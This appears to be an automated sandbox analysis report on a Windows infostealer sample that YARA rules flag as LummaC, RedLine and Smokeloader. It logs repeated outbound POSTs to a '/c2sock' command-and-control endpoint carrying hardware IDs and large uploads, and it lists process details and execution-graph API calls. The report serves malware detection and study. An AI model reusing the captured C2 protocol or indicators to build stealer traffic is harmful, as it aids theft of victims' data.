    Data Ascii: }`HXxSe5AZ_I&k6=iU=vOj2xcfqTVH#P-RkRB])>t'+./$=^hNgC6PAvxUxqE;I5/mP


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49708        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:54:34.823267937 CET  190                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 19013
    Host: 94.158.244.69
Nov 13, 2024 10:54:34.824714899 CET  11124              OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:54:34.828789949 CET  1236               OUT        Data Raw: ec 59 b4 31 f7 2c dc f7 8b 04 fd d8 c2 4e e2 ef 92 a2 c8 38 a1 dd 95 44 b4 40 ce 4e c9 51 26 24 a0 46 e3 cc d7 7c 7b b8 71 8e 6b 5d b8 50 dd 37 47 e3 0d 89 76 69 aa 31 33 34 d7 72 76 9d 43 01 ab f9 51 66 36 9a 76 96 dc e9 46 05 fd 66 6a d9 e3 d3
    Data Ascii: Y1,N8D@NQ&$F|{qk]P7Gvi134rvCQf6vFfjE{}C?:ewS%~F0ti)14r-A3rZ(;"heda?:>;.B%+RU)D(R*U>*Q*>
Nov 13, 2024 10:54:34.829701900 CET  2472               OUT        Data Raw: 60 76 40 1b c6 f7 fc 23 dc 38 87 11 d5 76 30 29 ee 41 cc b9 73 a9 87 e7 91 57 d5 a3 fc 40 1f d5 d6 ed bb 4a a3 b5 bd 56 d6 44 cc d5 b5 9f d0 b6 8e dc 78 b6 ef 96 c7 bd f9 44 97 b9 d6 da da 81 17 e3 72 c9 f2 18 33 d7 94 e5 72 73 1b 35 c1 db 9f 58
    Data Ascii: `v@#8v0)AsW@JVDxDr3rs5X>-~40aNDpnKoJoR,5XI:a?B?\,aKjK%R/, XX<``8]2Rh
Nov 13, 2024 10:54:34.829737902 CET  4181               OUT        Data Raw: 9a 02 a6 5d 58 50 55 cf c0 1e c2 18 eb ea b6 eb b8 7b c1 79 3f 48 48 84 9d c4 df 25 76 14 ee 90 28 3e ef 84 bd ca 7e e5 fa 34 82 bf 32 8a e1 05 fe da d5 f5 ab f7 37 bf 76 eb 11 8e 88 24 ae 22 a4 99 9a 62 2a 9a 29 f6 9f 69 76 cc 66 cd a4 d9 23 e2
    Data Ascii: ]XPU{y?HH%v(>~427v$"b*)ivf#JfxWP\XQ$u(JXoqDQVu6cMy8,U5vtwp#l`V/}()l"*5}e=`"4a0rfE[e7hLXCXT


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49709        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:54:44.482758999 CET  188                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 440
    Host: 94.158.244.69
Nov 13, 2024 10:54:44.484832048 CET  440                OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49710        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:54:53.728033066 CET  188                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 440
    Host: 94.158.244.69
Nov 13, 2024 10:54:53.728033066 CET  440                OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.8  49712        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:02.510430098 CET  188                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 440
    Host: 94.158.244.69
Nov 13, 2024 10:55:02.510850906 CET  440                OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.8  49713        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:12.140882969 CET  190                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 20174
    Host: 94.158.244.69
Nov 13, 2024 10:55:12.141294956 CET  11124              OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:55:12.145782948 CET  1236               OUT        Data Raw: d8 aa b4 b2 76 0f 56 57 5a b3 5e cc 4f c5 dd 5d 3b f3 ee 07 40 d7 33 ac 55 cb d8 d8 63 ef cb 8c 3e 7f 60 ab ab ad bb 67 ed 0b ad 3b e6 b6 e5 d4 cf 0d 8e 9e 38 d4 bd 7e ac 24 5d 2a 45 d3 dc 5e 1e 7b 27 dd ba e9 46 ee 53 b2 73 33 af 4b ce ed 6d bd
    Data Ascii: vVWZ^O];@3Uc>`g;8~$]*E^{'FSs3Kmr-n3|A/VKEoGo=}ur/?kS=>37U|uj\_uqQ+y#S|XH;+r=Z7:6}^fsnGWFGJz>Z6mfa
Nov 13, 2024 10:55:12.146226883 CET  4944               OUT        Data Raw: f1 34 5e 78 ee d8 83 13 f5 da b1 4b 97 2e e7 f7 dd fa d8 fd 7f fb 85 e4 4b a9 db 82 e7 df 75 df e3 fa 6b a5 c9 66 a3 b8 69 88 ce cd 4e e5 2f bd fc f4 13 53 47 9e 3c b5 ef d6 8f bf 79 ef c7 92 e7 d3 b7 05 13 ef ba ee c2 64 b5 d9 d8 54 ed 7d 4f 55
    Data Ascii: 4^xK.KukfiN/SG<ydT}OUO,/>X<YwWM/$?9UsFutx33jT+tguMBdz9{n8ShVi6}bQTG__fjTz5T,^_~j
Nov 13, 2024 10:55:12.146281004 CET  2870               OUT        Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Data Ascii:


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.8  49714        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:21.137038946 CET  189                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 1136
    Host: 94.158.244.69
Nov 13, 2024 10:55:21.137424946 CET  1136               OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.8  49715        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:30.297111988 CET  191                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 610895
    Host: 94.158.244.69
Nov 13, 2024 10:55:30.297679901 CET  11124              OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
Nov 13, 2024 10:55:30.301961899 CET  1236               OUT        Data Raw: a4 79 1f 2d f5 bf e4 19 c1 4d bb de 12 cd f8 5f a5 60 9d a0 cd 01 f3 d6 f9 35 ea 7f f9 93 e8 65 a9 e7 57 a3 fd bd 86 07 9a d6 17 9e 6b a9 dd 1b 65 f3 b3 c2 de 57 4d 79 6e bb a6 da 44 8f 71 70 df 91 96 7e e2 a0 0e 50 ce fb d5 fd bf c6 fc 8f 0f ff
    Data Ascii: y-M_`5eWkeWMynDqp~P^i*km<>k]5.>WW5gUtsH5w2resy:jbRzrQM_$o\Xi,TcyJ$}Ey2T+sV-rf-5Q-YW
Nov 13, 2024 10:55:30.302638054 CET  2472               OUT        Data Raw: 46 fc ef ee 1d 87 a4 26 cb ff b4 e1 05 91 c6 07 fb a3 ff d9 6c 30 74 c1 6d 86 a4 86 de 67 db 47 ff 93 49 b2 3f 73 5f ee fa bf 31 c3 c2 7a 3f 69 7f 61 84 fb 99 d1 06 18 98 1f bd 6f ca 96 c3 f4 23 a2 6d 10 fb 71 1c c6 27 c2 fd 66 78 7c 22 ea 09 11
    Data Ascii: F&l0tmgGI?s_1z?iao#mq'fx|"L3t@jd|<iuf4B8,fxdjJNMPAY'G'5t8kuNv9s??u
Nov 13, 2024 10:55:30.302700043 CET  4944               OUT        Data Raw: ce fc 95 3d c1 e6 73 3d 0b 44 f4 f9 b2 7e 8f fe 07 df e3 7e 5a 1f 7d 0f 8f 53 36 1d 19 fa 9f 34 43 9a 1f 0d 90 fe 07 c7 93 7d c0 d2 04 6d fb 64 6d a0 e9 7f d8 a7 cf 0b 6a fa 58 d7 27 0d 0f c7 cc 7e 5f e9 77 66 ff 2f 3c cf 9c f3 cb f5 01 e5 1a 80
    Data Ascii: =s=D~~Z}S64C}mdmjX'~_wf/<2d}?Y7d_Ou9s?9s?;OfZ,fO`?>73?5eqlf#-T#|y>\Wn6<5|
Nov 13, 2024 10:55:30.302721977 CET  2472               OUT        Data Raw: ff 46 47 6e f9 b3 c8 11 f5 f3 ee 3e c9 fb ef 96 b3 bd 7f fb 5c 66 37 40 18 d8 93 c2 c6 18 1a d9 ac 4b 7d 53 c3 23 0c ed ae 7e 3f 78 ce dc 65 5c cb f0 5c c6 76 4e 52 6e f0 72 67 f0 3a 78 ed a4 d7 7f d2 fb 6c d3 4f ac 86 fb 78 ee e3 67 f9 d7 e3 5e
    Data Ascii: FGn>\f7@K}S#~?xe\\vNRnrg:xlOxg^PQgYQ'8eK(7oo pybYGl;,rsWtPQo;~EY<qnnt>@85
Nov 13, 2024 10:55:30.302759886 CET  2472               OUT        Data Raw: a6 77 fd 8f 2b 61 ef 30 af 97 73 82 b9 3e 20 8e c3 14 a5 69 5d e9 19 df e9 ff e7 ff bb be b2 66 bf 5a f6 d3 15 b5 e1 b7 fc ba b4 83 b7 ae a8 bd bc e7 ca f3 25 a8 1d 8e 7f 7c 09 cf 24 96 f4 ff fd 8e 7f c1 2f fb e9 71 fa 7c dc e3 65 6f 0f 8c 0b e7
    Data Ascii: w+a0s> i]fZ%|$/q|eoJ|k~u?ptE]qy:s_85gq_x_mq'a1m;#33kb{F2,m9)~m|/m}?O_9
Nov 13, 2024 10:55:30.302772045 CET  2472               OUT        Data Raw: 66 3e db af eb ad d0 2f 89 fa 9d 71 70 3f fc db 7d c9 71 da 26 6e f5 9e 63 6d 39 5c 83 ba 41 f8 08 6a 88 50 33 c4 75 d6 60 53 e8 3d 84 93 d1 0a e5 6c 5c ae 31 06 f3 c3 7d a6 7b 86 08 6f c1 f5 a8 03 bb 29 b8 16 f7 c2 71 ce af c5 b6 e9 61 30 44 ec
    Data Ascii: f>/qp?}q&ncm9\AjP3u`S=l\1}{o)qa0D:pc>I/1\7~v/G'PZzg[UkVcwnwkik0h AcO+f~`;[
Nov 13, 2024 10:55:30.302793980 CET  2472               OUT        Data Raw: f1 5c f0 69 6f ff 19 7b 8e 0b ad 50 7e 16 fc 5c 71 d3 0c 75 a9 f7 bd 23 77 fe d6 7f 2f 67 fc d9 37 c7 27 f1 dd 24 b8 5f fb 4c 30 dd 07 e1 76 ef 5e e5 a7 65 eb 02 06 e1 eb 34 9c 26 2d b0 69 33 6c c2 02 e1 73 8d ce 0d a1 ef 25 99 e0 9b 97 f8 69 68
    Data Ascii: \io{P~\qu#w/g7'$_L0v^e4&-i3ls%ih@q},j\V7=+,|3<k$o-n&Si2LI;nWyZ_D\Zf_0|/i|y0sG9 9Oj<Jj,3<3f
Nov 13, 2024 10:55:30.302813053 CET  2472               OUT        Data Raw: bf 81 b0 fe 5f b7 fb 9f 5b ff af bb fd af 59 03 cc e3 7f 3c 66 da 9f bf cf f9 5f 53 06 d8 a5 fe 37 f3 4f ad 33 c0 34 ff 8b 19 a0 f3 bf a6 fc 2f b7 01 96 e4 7f 85 0d b0 43 fe 17 ee 37 fc 4f da 5f 2b fc af 68 0f 70 bb e6 ff 9a 6b 01 d2 fd 6c fe 27
    Data Ascii: _[Y<f_S7O34/C7O_+hpkl'{a;'M~H/D}}\s]Xo~\/X/pxhzVc0>+0ru~22WX=9z~oiE~%t?93\G0TT]3?`:A>rm?
Nov 13, 2024 10:55:30.302830935 CET  1236               OUT        Data Raw: af 6d fe af 39 ff c3 b4 bf 30 a2 e6 2f cd fb 9a 9d ff c1 7e 5f 1a 9f 7c 2e 8f c9 7d a1 f5 05 76 98 67 fe 87 b9 fe 5f 92 ff 49 27 e4 ac 10 d6 ff 49 ff a3 fb d1 f7 38 0f 18 be 87 e7 b2 f6 cf ec f9 8d ac 0d 28 fa 7a e9 7f e6 fa 7f b2 f6 2f 9c fb 6b
    Data Ascii: m90/~_|.}vg_I'I8(z/keF5<WByr\1O:!{9ix~>HXc4{fqN}YyO*;"Y\{4'y7o:]i}9?i


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
8           192.168.2.8  49716        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:39.827390909 CET  188                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 440
    Host: 94.158.244.69
Nov 13, 2024 10:55:39.827801943 CET  440                OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
9           192.168.2.8  49717        94.158.244.69   80                7500  C:\Users\user\Desktop\I2BJhmJou4.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 13, 2024 10:55:48.616439104 CET  188                OUT        POST /c2sock HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
    User-Agent: TeslaBrowser/5.5
    Content-Length: 440
    Host: 94.158.244.69
Nov 13, 2024 10:55:48.616862059 CET  440                OUT        Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
    Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID: 10
Source IP: 192.168.2.8
Source Port: 49718
Destination IP: 94.158.244.69
Destination Port: 80
PID: 7500
Process: C:\Users\user\Desktop\I2BJhmJou4.exe

Timestamp: Nov 13, 2024 10:55:57.724904060 CET
Bytes transferred: 188
Direction: OUT
Data:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: 94.158.244.69

Timestamp: Nov 13, 2024 10:55:57.725347042 CET
Bytes transferred: 440
Direction: OUT
Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID: 11
Source IP: 192.168.2.8
Source Port: 49719
Destination IP: 94.158.244.69
Destination Port: 80
PID: 7500
Process: C:\Users\user\Desktop\I2BJhmJou4.exe

Timestamp: Nov 13, 2024 10:56:06.579957008 CET
Bytes transferred: 188
Direction: OUT
Data:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: 94.158.244.69

Timestamp: Nov 13, 2024 10:56:06.580327034 CET
Bytes transferred: 440
Direction: OUT
Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID: 12
Source IP: 192.168.2.8
Source Port: 49720
Destination IP: 94.158.244.69
Destination Port: 80
PID: 7500
Process: C:\Users\user\Desktop\I2BJhmJou4.exe

Timestamp: Nov 13, 2024 10:56:15.360138893 CET
Bytes transferred: 188
Direction: OUT
Data:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: 94.158.244.69

Timestamp: Nov 13, 2024 10:56:15.360508919 CET
Bytes transferred: 440
Direction: OUT
Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


Session ID: 13
Source IP: 192.168.2.8
Source Port: 49721
Destination IP: 94.158.244.69
Destination Port: 80
PID: 7500
Process: C:\Users\user\Desktop\I2BJhmJou4.exe

Timestamp: Nov 13, 2024 10:56:24.128138065 CET
Bytes transferred: 188
Direction: OUT
Data:
POST /c2sock HTTP/1.1
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
User-Agent: TeslaBrowser/5.5
Content-Length: 440
Host: 94.158.244.69

Timestamp: Nov 13, 2024 10:56:24.128518105 CET
Bytes transferred: 440
Direction: OUT
Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;



                                                        Target ID:0
                                                        Start time:04:53:35
                                                        Start date:13/11/2024
                                                        Path:C:\Users\user\Desktop\I2BJhmJou4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\I2BJhmJou4.exe"
                                                        Imagebase:0x400000
                                                        File size:474'624 bytes
                                                        MD5 hash:C847CB3090530EC9AE2E82805A03360D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:04:56:32
                                                        Start date:13/11/2024
                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
                                                        Imagebase:0x6e0000
                                                        File size:483'680 bytes
                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true


                                                          Execution Graph

                                                          Execution Coverage:4%
                                                          Dynamic/Decrypted Code Coverage:10.1%
                                                          Signature Coverage:52.5%
                                                          Total number of Nodes:774
                                                          Total number of Limit Nodes:25
                                                          execution_graph 73663 4102d1 73666 447a80 73663->73666 73669 44e224 73666->73669 73670 4102da 73669->73670 73671 44e22f RtlFreeHeap 73669->73671 73671->73670 73672 44e244 GetLastError 73671->73672 73673 44e251 __dosmaperr 73672->73673 73675 4447a4 14 API calls __dosmaperr 73673->73675 73675->73670 73676 2ed003c 73677 2ed0049 73676->73677 73691 2ed0e0f SetErrorMode SetErrorMode 73677->73691 73682 2ed0265 73683 2ed02ce VirtualProtect 73682->73683 73685 2ed030b 73683->73685 73684 2ed0439 VirtualFree 73689 2ed05f4 LoadLibraryA 73684->73689 73690 2ed04be 73684->73690 73685->73684 73686 2ed04e3 LoadLibraryA 73686->73690 73688 2ed08c7 73689->73688 73690->73686 73690->73689 73692 2ed0223 73691->73692 73693 2ed0d90 73692->73693 73694 2ed0dad 73693->73694 73695 2ed0dbb GetPEB 73694->73695 73696 2ed0238 VirtualAlloc 73694->73696 73695->73696 73696->73682 73697 4069a1 73715 4069ba __CreateFrameInfo 73697->73715 73698 406aed lstrcatW lstrcatW 73698->73715 73699 407722 lstrcatW lstrcatW 73699->73715 73702 40738c 73703 408a5a lstrcatW lstrcatW 73716 40e14e 73703->73716 73706 408a43 73736 404710 46 API calls 73706->73736 73709 4360e1 15 API calls 73709->73715 73713 40620b 166 API calls 73713->73715 73714 405aaa 178 API calls 73714->73715 73715->73698 73715->73699 73715->73702 73715->73703 73715->73706 73715->73709 73715->73713 73715->73714 73730 403ead 46 API calls _strlen 73715->73730 73731 4034bc 46 API calls 73715->73731 73732 403d1e 46 API calls 73715->73732 73733 40476b 99 API calls 73715->73733 73734 404710 46 API calls 73715->73734 73735 4034fd 101 API calls 73715->73735 73729 40e172 __CreateFrameInfo 73716->73729 73717 408a85 73719 40b81c 43 API calls 73719->73729 73720 40f53e lstrcatW lstrcatW lstrcatW 73720->73729 73723 40e7bc lstrcatW 73727 40e14e 155 API calls 73723->73727 73724 40e14e 155 API calls 73724->73729 73725 447a80 14 API calls ___std_exception_destroy 73725->73729 73726 40e54f lstrcatW lstrcatW 
